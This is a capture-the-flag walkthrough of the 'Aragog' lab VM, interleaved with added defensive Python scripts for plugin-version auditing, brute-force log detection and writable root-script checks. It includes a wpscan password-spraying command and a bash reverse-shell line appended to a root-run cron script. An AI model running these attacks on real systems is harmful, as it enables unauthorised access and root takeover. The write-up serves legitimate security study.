HarryPotter: Aragog

Description

Enumeration:

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# netdiscover -i vboxnet1
Currently scanning: 192.168.20.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
____________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 08:00:27:f3:04:f7 1 42 PCS Systemtechnik GmbH
192.168.1.101 08:00:27:30:fb:c8 1 60 PCS Systemtechnik GmbH
┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# nmap -v -sT -sC -p- -A 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 15:59 IST
..............
Nmap scan report for 192.168.1.101
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:30:FB:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Uptime guess: 41.396 days (since Thu Mar 25 06:29:32 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://192.168.1.101/ 
┌──(s4t0sh㉿N4TR0)-[~]
└─$ dirb http://192.168.1.101

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 5 16:16:20 2021
URL_BASE: http://192.168.1.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.101/ ----
==> DIRECTORY: http://192.168.1.101/blog/
+ http://192.168.1.101/index.html (CODE:200|SIZE:97)
==> DIRECTORY: http://192.168.1.101/javascript/
+ http://192.168.1.101/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.101/blog/ ----
+ http://192.168.1.101/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.101/blog/wp-admin/
==> DIRECTORY: http://192.168.1.101/blog/wp-content/
==> DIRECTORY: http://192.168.1.101/blog/wp-includes/
+ http://192.168.1.101/blog/xmlrpc.php (CODE:405|SIZE:42)
http://192.168.1.101/blog/wp-admin
┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# wpscan --url http://192.168.1.101/blog/ -e ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart


[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.1.101/blog/wp-content/plugins/akismet/
| Latest Version: 4.1.9
| Last Updated: 2021-03-02T18:10:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.

[+] wp-file-manager
| Location: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/
| Last Updated: 2021-03-30T06:37:00.000Z
| Readme: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 7.1.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt
http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/files/install.php
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}
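The version finding above comes from the plugin's publicly readable readme.txt: WPScan reads the "Stable tag" line and compares it with the newest release. The following script is an added example (not part of the original write-up) that reproduces that check for an inventory of installed plugins. The readme text and the table of latest versions are constructed; the two numbers for wp-file-manager (6.0 installed, 7.1.1 latest) are the ones WPScan reported.

```python
"""Compare WordPress plugin versions from readme.txt against known latest.

Added example, not from the original write-up. The readme header and the
latest-version table are constructed; the wp-file-manager numbers match the
WPScan output (6.0 installed, 7.1.1 latest).
"""
import re

STABLE_TAG_RE = re.compile(r"^\s*Stable tag:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def stable_tag(readme_text):
    """Extract the 'Stable tag' value from a plugin readme.txt, or None."""
    m = STABLE_TAG_RE.search(readme_text)
    return m.group(1) if m else None


def version_key(version):
    """Turn '7.1.1' into (7, 1, 1) so versions compare numerically rather
    than as strings ('10.0' must sort above '9.0')."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


def is_outdated(installed, latest):
    """True when installed < latest, padding shorter tuples with zeros."""
    a, b = version_key(installed), version_key(latest)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def audit_plugins(inventory, latest_versions):
    """inventory: {slug: readme_text or None}; latest_versions: {slug: version}.
    Returns {slug: 'up to date' | 'outdated (x < y)' | 'unknown'}."""
    result = {}
    for slug, readme in inventory.items():
        installed = stable_tag(readme) if readme else None
        latest = latest_versions.get(slug)
        if installed is None or latest is None:
            result[slug] = "unknown"
        elif is_outdated(installed, latest):
            result[slug] = f"outdated ({installed} < {latest})"
        else:
            result[slug] = "up to date"
    return result


# Constructed readme header; real plugin readmes use this layout.
FILE_MANAGER_README = """=== File Manager ===
Contributors: (placeholder)
Requires at least: 4.0
Tested up to: 5.4
Stable tag: 6.0
License: GPLv2 or later
"""

INVENTORY = {
    "wp-file-manager": FILE_MANAGER_README,
    "akismet": None,                    # WPScan could not read a version either
}
LATEST = {"wp-file-manager": "7.1.1", "akismet": "4.1.9"}   # from the scan output


if __name__ == "__main__":
    for slug, status in audit_plugins(INVENTORY, LATEST).items():
        print(f"{slug}: {status}")
```

Run it directly and it reports wp-file-manager as outdated and akismet as unknown, the same two conclusions WPScan reached. Keeping readme.txt readable is what makes this fingerprinting possible from the outside, so the same check is worth running from the inside before an attacker does.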
┌──(root💀N4TR0)-[/home/s4t0sh/Downloads]
└─# wpscan --url http://192.168.1.101/blog/ -U hagrid98 -P /usr/share/wordlists/rockyou.txt -t 10
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - hagrid98 / password123
Trying hagrid98 / password123 Time: 00:00:17 < > (1390 / 14345782) 0.00% ETA: ??:??:??
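A wordlist attack like the one above is noisy: 1390 login attempts in 17 seconds from one address, all POSTs to wp-login.php. The script below is an added example (not from the original write-up) of the detection a defender would run over the Apache access log. The log lines are constructed to imitate that traffic; the combined log format, the 60-second window and the threshold of 10 POSTs are assumptions. It also counts POSTs to xmlrpc.php, which dirb found on this host and which accepts the same credentials.

```python
"""Spot wordlist attacks on the WordPress login in Apache access logs.

Added example, not part of the original write-up. The log lines are
constructed; the combined log format, window and threshold are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [ts] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Both ways to submit credentials to WordPress: the login form and the
# XML-RPC endpoint that dirb also found on the target.
LOGIN_PATHS = {"/blog/wp-login.php", "/blog/xmlrpc.php"}


def parse_line(line):
    """Return the fields we need from one access-log line, or None if the
    line does not match the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Map source IP -> largest number of login POSTs seen inside any
    sliding window, for sources that exceed `threshold`."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?", 1)[0] in LOGIN_PATHS:
            posts[rec["ip"]].append(rec["ts"])

    offenders = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start, best = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:   # slide the window forward
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            offenders[ip] = best
    return offenders


def _constructed_log():
    """Constructed sample: one source hammering the login form, plus some
    ordinary traffic that must not be flagged."""
    tz = timezone(timedelta(hours=5, minutes=30))          # IST, as in the nmap banner
    base = datetime(2021, 5, 5, 16, 30, 0, tzinfo=tz)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 4352 "-" "{ua}"'
    lines = []
    for i in range(15):                                   # 15 guesses in 15 s
        lines.append(fmt.format(ip="192.168.1.1", ts=(base + timedelta(seconds=i)).strftime(TS_FMT),
                                method="POST", path="/blog/wp-login.php", status=200, ua="WPScan v3.8.10"))
    lines.append(fmt.format(ip="192.168.1.50", ts=base.strftime(TS_FMT),
                            method="GET", path="/blog/", status=200, ua="Mozilla/5.0"))
    lines.append(fmt.format(ip="192.168.1.50", ts=(base + timedelta(seconds=30)).strftime(TS_FMT),
                            method="POST", path="/blog/wp-login.php", status=302, ua="Mozilla/5.0"))
    lines.append("this line is not in combined format and is skipped")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs within 60 s")
```

The sliding window matters more than a plain count per day: a legitimate user who mistypes a password twice never comes close to ten POSTs in a minute, while a wordlist run exceeds it within seconds. Rate limiting or fail2ban on the same two paths would have stopped this attack long before it reached password123.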
./pspy64 -p
hagrid98@Aragog:/opt$  echo "bash -i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
<i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
hagrid98@Aragog:/opt$ cat .backup.sh
cat .backup.sh
#!/bin/bash

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
bash -i >& /dev/tcp/192.168.1.1/1212 0>&1
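The root shell comes from one misconfiguration: /opt/.backup.sh is executed by root but writable by hagrid98, so appending a single line to it was enough. The audit below is an added example (not from the original write-up) of the check that would have caught this: every script that runs with elevated privileges must belong to a trusted uid, must not be group- or world-writable, and must not sit in a directory where another user can replace it. The files it inspects are constructed in a scratch directory; on a real host you would feed it the paths referenced by cron entries, systemd units and similar.

```python
"""Flag root-run scripts that other users can modify.

Added example, not from the original write-up. The files checked here are
constructed in a temporary directory; the ownership and mode rules are the
generic ones.
"""
import os
import stat
import tempfile


def audit_script(path, trusted_uids=(0,)):
    """Return a list of findings for one script (empty list means clean)."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink")            # target may live somewhere writable
        st = os.stat(path)
    if st.st_uid not in trusted_uids:
        findings.append(f"owned by uid {st.st_uid}")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    # A writable parent directory lets a user rename the file away and drop
    # a replacement, even when the file itself is read-only.
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable")
    return findings


def audit_many(paths, trusted_uids=(0,)):
    """Audit several scripts; only the ones with findings are reported."""
    report = {}
    for p in paths:
        try:
            f = audit_script(p, trusted_uids)
        except FileNotFoundError:
            f = ["missing (dangling reference)"]
        if f:
            report[p] = f
    return report


def demo():
    """Constructed scenario: a correctly locked-down backup script next to
    one that mirrors the Aragog misconfiguration."""
    me = (os.getuid(),)        # the scratch files belong to us, so trust our uid
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "backup_ok.sh")
        bad = os.path.join(d, ".backup.sh")
        for p in (good, bad):
            with open(p, "w") as fh:
                fh.write("#!/bin/bash\ncp -r /var/www/uploads /tmp/tmp_wp_uploads\n")
        os.chmod(good, 0o755)
        os.chmod(bad, 0o777)
        report = audit_many([good, bad, os.path.join(d, "gone.sh")], trusted_uids=me)
        return {os.path.basename(k): v for k, v in report.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name}: {', '.join(findings)}")
```

The dangling-reference case is included on purpose: a scheduled job pointing at a script that no longer exists is an invitation for anyone who can create the file. pspy found this one by watching what root executes; the audit finds it from the other direction, by looking at what root is about to execute.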
root@Aragog:~# cat horcrux2.txt
cat horcrux2.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/


Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Easy
Machine Name: Aragog
Horcruxes Hidden in this VM: 2 horcruxes

You have successfully pwned Aragog machine.
Here is your second hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}
